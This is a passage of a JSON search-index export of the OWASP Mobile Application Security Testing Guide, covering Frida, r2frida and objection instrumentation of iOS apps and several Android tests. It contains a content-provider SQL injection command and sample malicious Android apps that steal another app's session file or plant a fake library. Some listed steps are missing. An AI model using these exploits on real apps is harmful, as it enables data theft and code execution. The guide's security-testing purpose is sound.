"},{"location":"MASTG/techniques/ios/MASTG-TECH-0092/#re-signing","title":"Re-Signing","text":"Finally, we use the codesign tool to re-sign both binaries. You need to use your own signing identity (in this example 8004380F331DCA22CC1B47FB1A805890AE41C938), which you can output by executing the command security find-identity -v
.
$ rm -rf Payload/UnCrackable\\ Level\\ 1.app/_CodeSignature\n$ /usr/bin/codesign --force --sign 8004380F331DCA22CC1B47FB1A805890AE41C938 Payload/UnCrackable\\ Level\\ 1.app/FridaGadget.dylib\nPayload/UnCrackable Level 1.app/FridaGadget.dylib: replacing existing signature\n
entitlements.plist
is the file you created for your empty iOS project.
$ /usr/bin/codesign --force --sign 8004380F331DCA22CC1B47FB1A805890AE41C938 --entitlements entitlements.plist Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nPayload/UnCrackable Level 1.app/UnCrackable Level 1: replacing existing signature\n
Now you should be ready to run the modified app. Deploy and run the app on the device using ios-deploy:
ios-deploy --debug --bundle Payload/UnCrackable\\ Level\\ 1.app/\n
If everything went well, the app should start in debugging mode with LLDB attached. Frida should then be able to attach to the app as well. You can verify this via the frida-ps command:
$ frida-ps -U\nPID Name\n--- ------\n499 Gadget\n
When something goes wrong (and it usually does), mismatches between the provisioning profile and code-signing header are the most likely causes. Reading the official documentation helps you understand the code-signing process. Apple's entitlement troubleshooting page is also a useful resource.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0094/","title":"Getting Loaded Classes and Methods dynamically","text":"In the Frida REPL Objective-C runtime the ObjC
command can be used to access information within the running app. Within the ObjC
command the function enumerateLoadedClasses
lists the loaded classes for a given application.
$ frida -U -f com.iOweApp\n\n[iPhone::com.iOweApp]-> ObjC.enumerateLoadedClasses()\n{\n \"/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation\": [\n \"__NSBlockVariable__\",\n \"__NSGlobalBlock__\",\n \"__NSFinalizingBlock__\",\n \"__NSAutoBlock__\",\n \"__NSMallocBlock__\",\n \"__NSStackBlock__\"\n ],\n \"/private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\": [\n \"JailbreakDetection\",\n \"CriticalLogic\",\n \"ViewController\",\n \"AppDelegate\"\n ]\n}\n
Using ObjC.classes.<classname>.$ownMethods
the methods declared in each class can be listed.
[iPhone::com.iOweApp]-> ObjC.classes.JailbreakDetection.$ownMethods\n[\n \"+ isJailbroken\"\n]\n\n[iPhone::com.iOweApp]-> ObjC.classes.CriticalLogic.$ownMethods\n[\n \"+ doSha256:\",\n \"- a:\",\n \"- AES128Operation:data:key:iv:\",\n \"- coreLogic\",\n \"- bat\",\n \"- b:\",\n \"- hexString:\"\n]\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0095/","title":"Method Hooking","text":""},{"location":"MASTG/techniques/ios/MASTG-TECH-0095/#frida","title":"Frida","text":"In section \"Execution Tracing\" we've used frida-trace when navigating to a website in Safari and found that the initWithURL:
method is called to initialize a new URL request object. We can look up the declaration of this method on the Apple Developer Website:
- (instancetype)initWithURL:(NSURL *)url;\n
Using this information we can write a Frida script that intercepts the initWithURL:
method and prints the URL passed to the method. The full script is below. Make sure you read the code and inline comments to understand what's going on.
import sys\nimport frida\n\n\n# JavaScript to be injected\nfrida_code = \"\"\"\n\n // Obtain a reference to the initWithURL: method of the NSURLRequest class\n var URL = ObjC.classes.NSURLRequest[\"- initWithURL:\"];\n\n // Intercept the method\n Interceptor.attach(URL.implementation, {\n onEnter: function(args) {\n // Get a handle on NSString\n var NSString = ObjC.classes.NSString;\n\n // Obtain a reference to the NSLog function, and use it to print the URL value\n // args[2] refers to the first method argument (NSURL *url)\n var NSLog = new NativeFunction(Module.findExportByName('Foundation', 'NSLog'), 'void', ['pointer', '...']);\n\n // We should always initialize an autorelease pool before interacting with Objective-C APIs\n var pool = ObjC.classes.NSAutoreleasePool.alloc().init();\n\n try {\n // Creates a JS binding given a NativePointer.\n var myNSURL = new ObjC.Object(args[2]);\n\n // Create an immutable ObjC string object from a JS string object.\n var str_url = NSString.stringWithString_(myNSURL.toString());\n\n // Call the iOS NSLog function to print the URL to the iOS device logs\n NSLog(str_url);\n\n // Use Frida's console.log to print the URL to your terminal\n console.log(str_url);\n\n } finally {\n pool.release();\n }\n }\n });\n\"\"\"\n\nprocess = frida.get_usb_device().attach(\"Safari\")\nscript = process.create_script(frida_code)\nscript.load()\n\nsys.stdin.read()\n
Start Safari on the iOS device. Run the above Python script on your connected host and open the device log (as explained in the section \"Monitoring System Logs\" from the chapter \"iOS Basic Security Testing\"). Try opening a new URL in Safari, e.g. https://github.com/OWASP/owasp-mastg; you should see Frida's output in the logs as well as in your terminal.
Of course, this example illustrates only one of the things you can do with Frida. To unlock the tool's full potential, you should learn to use its JavaScript API. The documentation section of the Frida website has a tutorial and examples for using Frida on iOS.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/","title":"Process Exploration","text":"When testing an app, process exploration can provide the tester with deep insights into the app process memory. It can be achieved via runtime instrumentation and allows you to perform tasks such as:
As you can see, these tasks are rather supportive and/or passive, they'll help us collect data and information that will support other techniques. Therefore, they're normally used in combination with other techniques such as method hooking.
In the following sections you will be using r2frida to retrieve information straight from the app runtime. First start by opening an r2frida session to the target app (e.g. iGoat-Swift) that should be running on your iPhone (connected per USB). Use the following command:
r2 frida://usb//iGoat-Swift\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#memory-maps-and-inspection","title":"Memory Maps and Inspection","text":"You can retrieve the app's memory maps by running :dm
:
[0x00000000]> :dm\n0x0000000100b7c000 - 0x0000000100de0000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n0x0000000100de0000 - 0x0000000100e68000 rw- /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n0x0000000100e68000 - 0x0000000100e97000 r-- /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n...\n0x0000000100ea8000 - 0x0000000100eb0000 rw-\n0x0000000100eb0000 - 0x0000000100eb4000 r--\n0x0000000100eb4000 - 0x0000000100eb8000 r-x /usr/lib/TweakInject.dylib\n0x0000000100eb8000 - 0x0000000100ebc000 rw- /usr/lib/TweakInject.dylib\n0x0000000100ebc000 - 0x0000000100ec0000 r-- /usr/lib/TweakInject.dylib\n0x0000000100f60000 - 0x00000001012dc000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/Frameworks/Realm.framework/Realm\n
While you're searching or exploring the app memory, you can always verify where your current offset is located in the memory map. Instead of noting and searching for the memory address in this list you can simply run :dm.
. You'll find an example in the following section \"In-Memory Search\".
If you're only interested into the modules (binaries and libraries) that the app has loaded, you can use the command :il
to list them all:
[0x00000000]> :il\n0x0000000100b7c000 iGoat-Swift\n0x0000000100eb4000 TweakInject.dylib\n0x00000001862c0000 SystemConfiguration\n0x00000001847c0000 libc++.1.dylib\n0x0000000185ed9000 Foundation\n0x000000018483c000 libobjc.A.dylib\n0x00000001847be000 libSystem.B.dylib\n0x0000000185b77000 CFNetwork\n0x0000000187d64000 CoreData\n0x00000001854b4000 CoreFoundation\n0x00000001861d3000 Security\n0x000000018ea1d000 UIKit\n0x0000000100f60000 Realm\n
As you might expect you can correlate the addresses of the libraries with the memory maps: e.g. the main app binary iGoat-Swift is located at 0x0000000100b7c000
and the Realm Framework at 0x0000000100f60000
.
You can also use objection to display the same information.
$ objection --gadget OWASP.iGoat-Swift explore\n\nOWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # memory list modules\nSave the output by adding `--json modules.json` to this command\n\nName Base Size Path\n-------------------------------- ----------- -------------------- ------------------------------------------------------------------------------\niGoat-Swift 0x100b7c000 2506752 (2.4 MiB) /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGo...\nTweakInject.dylib 0x100eb4000 16384 (16.0 KiB) /usr/lib/TweakInject.dylib\nSystemConfiguration 0x1862c0000 446464 (436.0 KiB) /System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguratio...\nlibc++.1.dylib 0x1847c0000 368640 (360.0 KiB) /usr/lib/libc++.1.dylib\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#in-memory-search","title":"In-Memory Search","text":"In-memory search is a very useful technique to test for sensitive data that might be present in the app memory.
See r2frida's help on the search command (\\/?
) to learn about the search command and get a list of options. The following shows only a subset of them:
[0x00000000]> \\/?\n / search\n /j search json\n /w search wide\n /wj search wide json\n /x search hex\n /xj search hex json\n...\n
You can adjust your search by using the search settings \\e~search
. For example, \\e search.quiet=true;
will print only the results and hide search progress:
[0x00000000]> \\e~search\ne search.in=perm:r--\ne search.quiet=false\n
For now, we'll continue with the defaults and concentrate on string search. In this first example, you can start by searching for something that you know should be located in the main binary of the app:
[0x00000000]> \\/ iGoat\nSearching 5 bytes: 69 47 6f 61 74\nSearching 5 bytes in [0x0000000100b7c000-0x0000000100de0000]\n...\nhits: 509\n0x100d7d332 hit2_0 iGoat_Swift24StringAnalysisExerciseVCC\n0x100d7d3b2 hit2_1 iGoat_Swift28BrokenCryptographyExerciseVCC\n0x100d7d442 hit2_2 iGoat_Swift23BackgroundingExerciseVCC\n0x100d7d4b2 hit2_3 iGoat_Swift9AboutCellC\n0x100d7d522 hit2_4 iGoat_Swift12FadeAnimatorV\n
Now take the first hit, seek to it and check your current location in the memory map:
[0x00000000]> s 0x100d7d332\n[0x100d7d332]> :dm.\n0x0000000100b7c000 - 0x0000000100de0000 r-x /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app/iGoat-Swift\n
As expected, you are located in the region of the main iGoat-Swift binary (r-x, read and execute). In the previous section, you saw that the main binary is located between 0x0000000100b7c000
and 0x0000000100e97000
.
Now, for this second example, you can search for something that's not in the app binary nor in any loaded library, typically user input. Open the iGoat-Swift app and navigate in the menu to Authentication -> Remote Authentication -> Start. There you'll find a password field that you can overwrite. Write the string \"owasp-mstg\" but do not click on Login just yet. Perform the following two steps.
[0x00000000]> \\/ owasp-mstg\nhits: 1\n0x1c06619c0 hit3_0 owasp-mstg\n
In fact, the string could be found at address 0x1c06619c0
. Seek s
to there and retrieve the current memory region with :dm.
.
[0x100d7d332]> s 0x1c06619c0\n[0x1c06619c0]> :dm.\n0x00000001c0000000 - 0x00000001c8000000 rw-\n
Now you know that the string is located in a rw- (read and write) region of the memory map.
Additionally, you can search for occurrences of the wide version of the string (/w
) and, again, check their memory regions:
This time we run the \\dm.
command for all @@
hits matching the glob hit5_*
.
[0x00000000]> /w owasp-mstg\nSearching 20 bytes: 6f 00 77 00 61 00 73 00 70 00 2d 00 6d 00 73 00 74 00 67 00\nSearching 20 bytes in [0x0000000100708000-0x000000010096c000]\n...\nhits: 2\n0x1020d1280 hit5_0 6f0077006100730070002d006d00730074006700\n0x1030c9c85 hit5_1 6f0077006100730070002d006d00730074006700\n\n[0x00000000]> \\dm.@@ hit5_*\n0x0000000102000000 - 0x0000000102100000 rw-\n0x0000000103084000 - 0x00000001030cc000 rw-\n
They are in a different rw- region. Note that searching for the wide versions of strings is sometimes the only way to find them as you'll see in the following section.
In-memory search can be very useful to quickly know if certain data is located in the main app binary, inside a shared library or in another region. You may also use it to test the behavior of the app regarding how the data is kept in memory. For instance, you could continue the previous example, this time clicking on Login and searching again for occurrences of the data. Also, you may check if you still can find those strings in memory after the login is completed to verify if this sensitive data is wiped from memory after its use.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0096/#memory-dump","title":"Memory Dump","text":"You can dump the app's process memory with objection and Fridump. To take advantage of these tools on a non-jailbroken device, the Android app must be repackaged with frida-gadget.so
and re-signed. A detailed explanation of this process is in the section \"Dynamic Analysis on Non-Jailbroken Devices\". To use these tools on a jailbroken phone, simply have frida-server installed and running.
With objection it is possible to dump all memory of the running process on the device by using the command memory dump all
.
$ objection explore\n\niPhone on (iPhone: 10.3.1) [usb] # memory dump all /Users/foo/memory_iOS/memory\nDumping 768.0 KiB from base: 0x1ad200000 [####################################] 100%\nMemory dumped to file: /Users/foo/memory_iOS/memory\n
Alternatively you can use Fridump. First, you need the name of the app you want to dump, which you can get with frida-ps
.
$ frida-ps -U\n PID Name\n---- ------\n1026 Gadget\n
Afterwards, specify the app name in Fridump.
$ python3 fridump.py -u Gadget -s\n\nCurrent Directory: /Users/foo/PentestTools/iOS/fridump\nOutput directory is set to: /Users/foo/PentestTools/iOS/fridump/dump\nCreating directory...\nStarting Memory dump...\nProgress: [##################################################] 100.0% Complete\n\nRunning strings on all files:\nProgress: [##################################################] 100.0% Complete\n\nFinished! Press Ctrl+C\n
When you add the -s
flag, all strings are extracted from the dumped raw memory files and added to the file strings.txt
, which is stored in Fridump's dump directory.
In both cases, if you open the file in radare2 you can use its search command (/
). Note that first we do a standard string search which doesn't succeed and next we search for a wide string, which successfully finds our string \"owasp-mstg\".
$ r2 memory_ios\n[0x00000000]> / owasp-mstg\nSearching 10 bytes in [0x0-0x628c000]\nhits: 0\n[0x00000000]> /w owasp-mstg\nSearching 20 bytes in [0x0-0x628c000]\nhits: 1\n0x0036f800 hit4_0 6f0077006100730070002d006d00730074006700\n
Next, we can seek to its address using s 0x0036f800
or s hit4_0
and print it using psw
(which stands for print string wide) or use px
to print its raw hexadecimal values:
[0x0036f800]> psw\nowasp-mstg\n\n[0x0036f800]> px 48\n- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n0x0036f800 6f00 7700 6100 7300 7000 2d00 6d00 7300 o.w.a.s.p.-.m.s.\n0x0036f810 7400 6700 0000 0000 0000 0000 0000 0000 t.g.............\n0x0036f820 0000 0000 0000 0000 0000 0000 0000 0000 ................\n
Note that in order to find this string using the strings
command you'll have to specify an encoding using the -e
flag and in this case l
for 16-bit little-endian character.
$ strings -e l memory_ios | grep owasp-mstg\nowasp-mstg\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0097/","title":"Runtime Reverse Engineering","text":"Runtime reverse engineering can be seen as the on-the-fly version of reverse engineering where you don't have the binary data to your host computer. Instead, you'll analyze it straight from the memory of the app.
We'll keep using the iGoat-Swift app, open a session with r2frida r2 frida://usb//iGoat-Swift
and you can start by displaying the target binary information by using the :i
command:
[0x00000000]> :i\narch arm\nbits 64\nos darwin\npid 2166\nuid 501\nobjc true\nruntime V8\njava false\ncylang true\npageSize 16384\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\ncwd /\n
Search all symbols of a certain module with :is <lib>
, e.g. :is libboringssl.dylib
.
The following does a case-insensitive search (grep) for symbols including \"aes\" (~+aes
).
[0x00000000]> \\is libboringssl.dylib~+aes\n0x1863d6ed8 s EVP_aes_128_cbc\n0x1863d6ee4 s EVP_aes_192_cbc\n0x1863d6ef0 s EVP_aes_256_cbc\n0x1863d6f14 s EVP_has_aes_hardware\n0x1863d6f1c s aes_init_key\n0x1863d728c s aes_cipher\n0x0 u ccaes_cbc_decrypt_mode\n0x0 u ccaes_cbc_encrypt_mode\n...\n
Or you might prefer to look into the imports/exports. For example:
:ii iGoat-Swift
.:iE /usr/lib/libc++.1.dylib
.For big binaries it's recommended to pipe the output to the internal less program by appending ~..
, i.e. :ii iGoat-Swift~..
(if not, for this binary, you'd get almost 5000 lines printed to your terminal).
The next thing you might want to look at are the classes:
[0x00000000]> \\ic~+passcode\nPSPasscodeField\n_UITextFieldPasscodeCutoutBackground\nUIPasscodeField\nPasscodeFieldCell\n...\n
List class fields:
[0x19687256c]> \\ic UIPasscodeField\n0x000000018eec6680 - becomeFirstResponder\n0x000000018eec5d78 - appendString:\n0x000000018eec6650 - canBecomeFirstResponder\n0x000000018eec6700 - isFirstResponder\n0x000000018eec6a60 - hitTest:forEvent:\n0x000000018eec5384 - setKeyboardType:\n0x000000018eec5c8c - setStringValue:\n0x000000018eec5c64 - stringValue\n...\n
Imagine that you are interested into 0x000000018eec5c8c - setStringValue:
. You can seek to that address with s 0x000000018eec5c8c
, analyze that function af
and print 10 lines of its disassembly pd 10
:
[0x18eec5c8c]> pd 10\n\u256d (fcn) fcn.18eec5c8c 35\n\u2502 fcn.18eec5c8c (int32_t arg1, int32_t arg3);\n\u2502 bp: 0 (vars 0, args 0)\n\u2502 sp: 0 (vars 0, args 0)\n\u2502 rg: 2 (vars 0, args 2)\n\u2502 0x18eec5c8c f657bd not byte [rdi - 0x43] ; arg1\n\u2502 0x18eec5c8f a9f44f01a9 test eax, 0xa9014ff4\n\u2502 0x18eec5c94 fd std\n\u2502 \u256d\u2500< 0x18eec5c95 7b02 jnp 0x18eec5c99\n\u2502 \u2502 0x18eec5c97 a9fd830091 test eax, 0x910083fd\n\u2502 0x18eec5c9c f30300 add eax, dword [rax]\n\u2502 0x18eec5c9f aa stosb byte [rdi], al\n\u2502 \u256d\u2500< 0x18eec5ca0 e003 loopne 0x18eec5ca5\n\u2502 \u2502 0x18eec5ca2 02aa9b494197 add ch, byte [rdx - 0x68beb665] ; arg3\n\u2570 0x18eec5ca8 f4 hlt\n
Finally, instead of doing a full memory search for strings, you may want to retrieve the strings from a certain binary and filter them, as you'd do offline with radare2. For this you have to find the binary, seek to it and then run the :iz
command.
It's recommended to apply a filter with a keyword ~<keyword>
/~+<keyword>
to minimize the terminal output. If you just want to explore all results you can also pipe them to the internal less \\iz~..
.
[0x00000000]> :il~iGoa\n0x00000001006b8000 iGoat-Swift\n[0x00000000]> s 0x00000001006b8000\n[0x1006b8000]> :iz\nReading 2.390625MB ...\nDo you want to print 8568 lines? (y/N) N\n[0x1006b8000]> :iz~+hill\nReading 2.390625MB ...\n[0x1006b8000]> :iz~+pass\nReading 2.390625MB ...\n0x00000001006b93ed \"passwordTextField\"\n0x00000001006bb11a \"11iGoat_Swift20KeychainPasswordItemV0C5ErrorO\"\n0x00000001006bb164 \"unexpectedPasswordData\"\n0x00000001006d3f62 \"Error reading password from keychain - \"\n0x00000001006d40f2 \"Incorrect Password\"\n0x00000001006d4112 \"Enter the correct password\"\n0x00000001006d4632 \"T@\"UITextField\",N,W,VpasswordField\"\n0x00000001006d46f2 \"CREATE TABLE IF NOT EXISTS creds (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password TEXT);\"\n0x00000001006d4792 \"INSERT INTO creds(username, password) VALUES(?, ?)\"\n
To learn more, please refer to the r2frida wiki.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0098/","title":"Patching React Native Apps","text":"If the React Native framework has been used for development, the main application code is in the file Payload/[APP].app/main.jsbundle
. This file contains the JavaScript code. Most of the time, the JavaScript code in this file is minified. With the tool JStillery, a human-readable version of the file can be retrieved, which will allow code analysis. The CLI version of JStillery and the local server are preferable to the online version because the latter discloses the source code to a third party.
At installation time, the application archive is unpacked into the folder /private/var/containers/Bundle/Application/[GUID]/[APP].app
from iOS 10 onward, so the main JavaScript application file can be modified at this location.
To identify the exact location of the application folder, you can use the tool ipainstaller:
ipainstaller -l
to list the applications installed on the device. Get the name of the target application from the output list.ipainstaller -i [APP_NAME]
to display information about the target application, including the installation and data folder locations.Application:
.Use the following approach to patch the JavaScript file:
Payload/[APP].app/main.jsbundle
to a temporary file.JStillery
to beautify and de-obfuscate the contents of the temporary file.Payload/[APP].app/main.jsbundle
file.Make sure that the unlocked key is used during the application flow. For example, the key may be used to decrypt local storage or a message received from a remote endpoint. If the application simply checks whether the user has unlocked the key or not, the application may be vulnerable to a local authentication bypass.
"},{"location":"MASTG/tests/android/MASVS-AUTH/MASTG-TEST-0017/#dynamic-analysis","title":"Dynamic Analysis","text":"Validate the duration of time (seconds) for which the key is authorized to be used after the user is successfully authenticated. This is only needed if setUserAuthenticationRequired
is used.
Note that there are quite some vendor/third party SDKs, which provide biometric support, but which have their own insecurities. Be very cautious when using third party SDKs to handle sensitive authentication logic.
"},{"location":"MASTG/tests/android/MASVS-AUTH/MASTG-TEST-0018/#dynamic-analysis","title":"Dynamic Analysis","text":"Please take a look at this detailed blog article about the Android KeyStore and Biometric authentication. This research includes two Frida scripts which can be used to test insecure implementations of biometric authentication and try to bypass them:
CryptoObject
is not used in the authenticate
method of the BiometricPrompt
class. The authentication implementation relies on the callback onAuthenticationSucceded
being called.CryptoObject
is used, but used in an incorrect way. The detailed explanation can be found in the section \"Crypto Object Exception Handling\" in the blog post.For any publicly accessible data storage, any process can override the data. This means that input validation needs to be applied the moment the data is read back again.
Note: The same is true for private accessible data on a rooted device
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#static-analysis","title":"Static analysis","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#using-shared-preferences","title":"Using Shared Preferences","text":"When you use the SharedPreferences.Editor
to read or write int/boolean/long values, you cannot check whether the data is overridden or not. However: it can hardly be used for actual attacks other than chaining the values (e.g. no additional exploits can be packed which will take over the control flow). In the case of a String
or a StringSet
you should be careful with how the data is interpreted. Using reflection based persistence? Check the section on \"Testing Object Persistence\" for Android to see how it should be validated. Using the SharedPreferences.Editor
to store and read certificates or keys? Make sure you have patched your security provider given vulnerabilities such as found in Bouncy Castle.
In all cases, having the content HMACed can help to ensure that no additions and/or changes have been applied.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0002/#using-other-storage-mechanisms","title":"Using Other Storage Mechanisms","text":"In case other public storage mechanisms (than the SharedPreferences.Editor
) are used, the data needs to be validated the moment it is read from the storage mechanism.
To test for injection flaws you need to first rely on other tests and check for functionality that might have been exposed:
An example of a vulnerable IPC mechanism is shown below.
You can use ContentProviders to access database information, and you can probe services to see if they return data. If data is not validated properly, the content provider may be prone to SQL injection while other apps are interacting with it. See the following vulnerable implementation of a ContentProvider.
<provider\n android:name=\".OMTG_CODING_003_SQL_Injection_Content_Provider_Implementation\"\n android:authorities=\"sg.vp.owasp_mobile.provider.College\">\n</provider>\n
The AndroidManifest.xml
above defines a content provider that's exported and therefore available to all other apps. The query
function in the OMTG_CODING_003_SQL_Injection_Content_Provider_Implementation.java
class should be inspected.
@Override\npublic Cursor query(Uri uri, String[] projection, String selection,String[] selectionArgs, String sortOrder) {\n SQLiteQueryBuilder qb = new SQLiteQueryBuilder();\n qb.setTables(STUDENTS_TABLE_NAME);\n\n switch (uriMatcher.match(uri)) {\n case STUDENTS:\n qb.setProjectionMap(STUDENTS_PROJECTION_MAP);\n break;\n\n case STUDENT_ID:\n // SQL Injection when providing an ID\n qb.appendWhere( _ID + \"=\" + uri.getPathSegments().get(1));\n Log.e(\"appendWhere\",uri.getPathSegments().get(1).toString());\n break;\n\n default:\n throw new IllegalArgumentException(\"Unknown URI \" + uri);\n }\n\n if (sortOrder == null || sortOrder == \"\"){\n /**\n * By default sort on student names\n */\n sortOrder = NAME;\n }\n Cursor c = qb.query(db, projection, selection, selectionArgs,null, null, sortOrder);\n\n /**\n * register to watch a content URI for changes\n */\n c.setNotificationUri(getContext().getContentResolver(), uri);\n return c;\n}\n
While the user is providing a STUDENT_ID at content://sg.vp.owasp_mobile.provider.College/students
, the query statement is prone to SQL injection. Obviously prepared statements must be used to avoid SQL injection, but input validation should also be applied so that only input that the app is expecting is processed.
All app functions that process data coming in through the UI should implement input validation:
public boolean isAlphaNumeric(String s){\n String pattern= \"^[a-zA-Z0-9]*$\";\n return s.matches(pattern);\n}\n
An alternative to validation functions is type conversion, with, for example, Integer.parseInt
if only integers are expected. The OWASP Input Validation Cheat Sheet contains more information about this topic.
The tester should manually test the input fields with strings like OR 1=1--
if, for example, a local SQL injection vulnerability has been identified.
On a rooted device, the command content can be used to query the data from a content provider. The following command queries the vulnerable function described above.
# content query --uri content://sg.vp.owasp_mobile.provider.College/students\n
SQL injection can be exploited with the following command. Instead of getting the record for Bob only, the user can retrieve all data.
# content query --uri content://sg.vp.owasp_mobile.provider.College/students --where \"name='Bob') OR 1=1--''\"\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/","title":"Testing Implicit Intents","text":""},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#overview","title":"Overview","text":"When testing for implicit intents you need to check if they are vulnerable to injection attacks or potentially leaking sensitive data.
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#static-analysis","title":"Static Analysis","text":"Inspect the Android Manifest and look for any <intent>
signatures defined inside blocks (which specify the set of other apps an app intends to interact with), check if it contains any system actions (e.g. android.intent.action.GET_CONTENT
, android.intent.action.PICK
, android.media.action.IMAGE_CAPTURE
, etc.) and browse the source code for their occurrence.
For example, the following Intent
doesn't specify any concrete component, meaning that it's an implicit intent. It sets the action android.intent.action.GET_CONTENT
to ask the user for input data and then the app starts the intent by startActivityForResult
and specifying an image chooser.
Intent intent = new Intent();\nintent.setAction(\"android.intent.action.GET_CONTENT\");\nstartActivityForResult(Intent.createChooser(intent, \"\"), REQUEST_IMAGE);\n
The app uses startActivityForResult
instead of startActivity
, indicating that it expects a result (in this case an image), so you should check how the return value of the intent is handled by looking for the onActivityResult
callback. If the return value of the intent isn't properly validated, an attacker may be able to read arbitrary files or execute arbitrary code from the app's internal `/data/data/' storage. A full description of this type of attack can be found in the following blog post."},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#case-1-arbitrary-file-read","title":"Case 1: Arbitrary File Read","text":"
In this example we're going to see how an attacker can read arbitrary files from within the app's internal storage /data/data/<appname>
due to the improper validation of the return value of the intent.
The performAction
method in the following example reads the implicit intents return value, which can be an attacker provided URI and hands it to getFileItemFromUri
. This method copies the file to a temp folder, which is usual if this file is displayed internally. But if the app stores the URI provided file in an external temp directory e.g by calling getExternalCacheDir
or getExternalFilesDir
an attacker can read this file if he sets the permission android.permission.READ_EXTERNAL_STORAGE
.
private void performAction(Action action){\n ...\n Uri data = intent.getData();\n if (!(data == null || (fileItemFromUri = getFileItemFromUri(data)) == null)) {\n ...\n }\n}\n\nprivate FileItem getFileItemFromUri(Context, context, Uri uri){\n String fileName = UriExtensions.getFileName(uri, context);\n File file = new File(getExternalCacheDir(), \"tmp\");\n file.createNewFile();\n copy(context.openInputStream(uri), new FileOutputStream(file));\n ...\n}\n
The following is the source of a malicious app that exploits the above vulnerable code.
AndroidManifest.xml
<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\" />\n<application>\n <activity android:name=\".EvilContentActivity\">\n <intent-filter android:priority=\"999\">\n <action android:name=\"android.intent.action.GET_CONTENT\" />\n <data android:mimeType=\"*/*\" />\n </intent-filter>\n </activity>\n</application>\n
EvilContentActivity.java
public class EvilContentActivity extends Activity{\n @Override\n protected void OnCreate(@Nullable Bundle savedInstanceState){\n super.OnCreate(savedInstanceState);\n setResult(-1, new Intent().setData(Uri.parse(\"file:///data/data/<victim_app>/shared_preferences/session.xml\")));\n finish();\n }\n}\n
If the user selects the malicious app to handle the intent, the attacker can now steal the session.xml
file from the app's internal storage. In the previous example, the victim must explicitly select the attacker's malicious app in a dialog. However, developers may choose to suppress this dialog and automatically determine a recipient for the intent. This would allow the attack to occur without any additional user interaction.
The following code sample implements this automatic selection of the recipient. By specifying a priority in the malicious app's intent filter, the attacker can influence the selection sequence.
Intent intent = new Intent(\"android.intent.action.GET_CONTENT\");\nfor(ResolveInfo info : getPackageManager().queryIntentActivities(intent, 0)) {\n intent.setClassName(info.activityInfo.packageName, info.activityInfo.name);\n startActivityForResult(intent);\n return;\n}\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#case-2-arbitrary-code-execution","title":"Case 2: Arbitrary Code Execution","text":"An improperly handled return value of an implicit intent can lead to arbitrary code execution if the victim app allows content://
and file://
URLs.
An attacker can implement a ContentProvider
that contains public Cursor query(...)
to set an arbitrary file (in this case lib.so), and if the victim loads this file from the content provider by executing copy
the attacker's ParcelFileDescriptor openFile(...)
method will be executed and return a malicious fakelib.so.
AndroidManifest.xml
<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\" />\n<application>\n <activity android:name=\".EvilContentActivity\">\n <intent-filter android:priority=\"999\">\n <action android:name=\"android.intent.action.GET_CONTENT\" />\n <data android:mimeType=\"*/*\" />\n </intent-filter>\n </activity>\n <provider android:name=\".EvilContentProvider\" android:authorities=\"com.attacker.evil\" android:enabled=\"true\" android:exported=\"true\"></provider>\n</application>\n
EvilContentProvider.java
public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {\n MatrixCursor matrixCursor = new MatrixCursor(new String[]{\"_display_name\"});\n matrixCursor.addRow(new Object[]{\"../lib-main/lib.so\"});\n return matrixCursor;\n}\npublic ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {\n return ParcelFileDescriptor.open(new File(\"/data/data/com.attacker/fakelib.so\"), ParcelFileDescriptor.MODE_READ_ONLY);\n}\n
EvilContentActivity.java
public class EvilContentActivity extends Activity{\n @Override\n protected void OnCreate(@Nullable Bundle savedInstanceState){\n super.OnCreate(savedInstanceState);\n setResult(-1, new Intent().setData(Uri.parse(\"content:///data/data/com.attacker/fakelib.so\")));\n finish();\n }\n}\n
"},{"location":"MASTG/tests/android/MASVS-CODE/MASTG-TEST-0026/#dynamic-analysis","title":"Dynamic Analysis","text":"A convenient way to dynamically test for implicit intents, especially to identify potentially leaked sensitive data, is to use Frida or frida-trace and hook the startActivityForResult
and onActivityResult
methods and inspect the provided intents and the data they contain.
In order to test for URL loading in WebViews you need to carefully analyze handling page navigation, especially when users might be able to navigate away from a trusted environment. The default and safest behavior on Android is to let the default web browser open any link that the user might click inside the WebView. However, this default logic can be modified by configuring a WebViewClient
